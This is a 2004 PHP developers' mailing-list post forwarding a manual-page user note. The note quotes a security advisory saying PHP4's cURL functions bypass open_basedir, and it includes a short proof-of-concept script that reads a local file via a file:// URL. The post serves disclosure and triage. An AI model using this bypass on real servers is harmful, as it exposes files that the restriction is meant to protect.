[PHP-DEV] [Fwd: [PHP-NOTES] note 46955 added to function.curl-init]

Thu, 28 Oct 2004 09:12:13 -0700 

Is this legitimate?
I took a (very) quick look at bugs, and didn't see it.

(deleted the note)

S

-------- Original Message --------
Subject: [PHP-NOTES] note 46955 added to function.curl-init
Date: Thu, 28 Oct 2004 09:03:55 -0700
From: [EMAIL PROTECTED] (a)
To: [EMAIL PROTECTED]

from http://www.packetstormsecurity.org/0410-advisories/php4curl.txt

====================================================
Subject: PHP4 cURL functions bypass open_basedir
Author: frame at kernelpanik.org
Product: PHP4 compile with cURL (not tested in PHP5)
Vendor: PHP/Zend
Vendor URL: www.php.net
Tipe: Local
Risk: Low/Medium
=====================================================

PHP cURL functions bypass open_basedir
protection, so users can navigate through
filesystem.

For example, setting "open_basedir" in php.ini to
"/var/www/html" anybody can retrieve "/etc/parla"
using cURL functions.

== Proof of concept (curl.php)
<?php
$ch = curl_init("file:///etc/parla");
$file=curl_exec($ch);
echo $file
?>

== Demo
$ cat /etc/parla
don't read please!

$ links -dump http://localhost/curltest/curl.php
don't read please!

== Release Timeline
No release timeline.

--
FraMe <[EMAIL PROTECTED]>
http://www.kernelpanik.org
----
Manual Page -- http://www.php.net/manual/en/function.curl-init.php
Edit -- http://master.php.net/manage/user-notes.php?action=edit+46955
Delete -- http://master.php.net/manage/user-notes.php?action=delete+46955&report=yes
Reason: bad code -- http://master.php.net/manage/user-notes.php?action=delete+46955&report=yes&reason=bad+code
Reason: spam -- http://master.php.net/manage/user-notes.php?action=delete+46955&report=yes&reason=spam
Reason: useless example -- http://master.php.net/manage/user-notes.php?action=delete+46955&report=yes&reason=useless+example
Reason: contains commercial links -- http://master.php.net/manage/user-notes.php?action=delete+46955&report=yes&reason=contains+commercial+links
Reason: useless note -- http://master.php.net/manage/user-notes.php?action=delete+46955&report=yes&reason=useless+note
Reject -- http://master.php.net/manage/user-notes.php?action=reject+46955&report=yes
Search -- http://master.php.net/manage/user-notes.php

--
PHP Notes Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

--
PHP Internals - PHP Runtime Development Mailing List
To unsubscribe, visit: http://www.php.net/unsub.php

Reply via email to